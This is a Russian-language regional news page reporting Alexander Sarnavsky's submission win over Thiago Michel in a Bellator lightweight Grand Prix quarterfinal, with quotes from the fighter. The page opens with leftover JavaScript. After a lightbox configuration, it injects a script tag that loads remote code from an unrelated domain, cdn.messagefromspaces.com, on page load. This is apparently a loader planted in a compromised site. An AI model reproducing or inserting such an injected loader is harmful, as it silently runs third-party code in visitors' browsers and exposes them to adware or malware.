, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
7 февраля, 2013 Спорт

Тигриная хватка — Александр (Тигр) Сарнавский вышел в полуфинал

Тигриная хватка

На минувшей неделе Александр (Тигр) Сарнавский в четвертьфинале турнира по смешанным единоборствам Bellator одолел бразильца Тиаго Мичела. Бразилец сдался уже во втором раунде, пропустив Александра в полуфинал, где его теперь ожидает бой с американцем Дэвидом Рикелсом.

Первого февраля состоялся поединок омского бойца Александра Сарнавского против бразильца Тиаго Мичела. Первый раунд прошел в равной борьбе, с небольшим преимуществом Александра. Во втором раунде Сарнавскому удалось выйти на удушающий прием, и на четвертой минуте бразилец был вынужден сдаться. Таким образом, Сарнавский вышел в полуфинал Гран-при Bellator в легком весе.

– Я всегда готовлюсь драться до конца, все три раунда, – поделился впечатлениями Александр Сарнавский после поединка. – Но в этот раз почувствовал, что незачем затягивать бой и лучше закончить его досрочно. Тиаго был очень достойный соперник, он очень хорошо держался.

Также Александр рассказал, что поражение в предыдущем Гран-при сделало его несколько сильнее:

– До этого я шел без поражений, к тому же оказался на крупном и малознакомом турнире, среди бойцов высшего уровня, которые дерутся до последнего. Чувствовалась большая ответственность. Это поражение немного отпустило меня психологически. Тогда я проиграл, но не опустил руки. Хотелось бы поблагодарить Bellator за возможность выступать во втором Гран-при. Также спасибо моему тренеру Александру Шлеменко, который подготовил меня к этому бою, и моему другу и партнеру Андрею Корешкову.

Теперь соперником Александра Сарнавского в полуфинале Гран-при станет 24-летний американец Дэвид Рикелс. В Bellator он дебютировал в 2011 году, проведя за это время семь боёв и потерпев всего одно поражение. Точная дата поединка будет известна позже.

Также напомним, что в грядущую пятницу, 8 февраля, наставник Александра Сарнавского, омский боец Александр (Шторм) Шлеменко сразится за титул чемпиона мира по версии Bellator с бразильцем Микелем Фалькао.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Спорт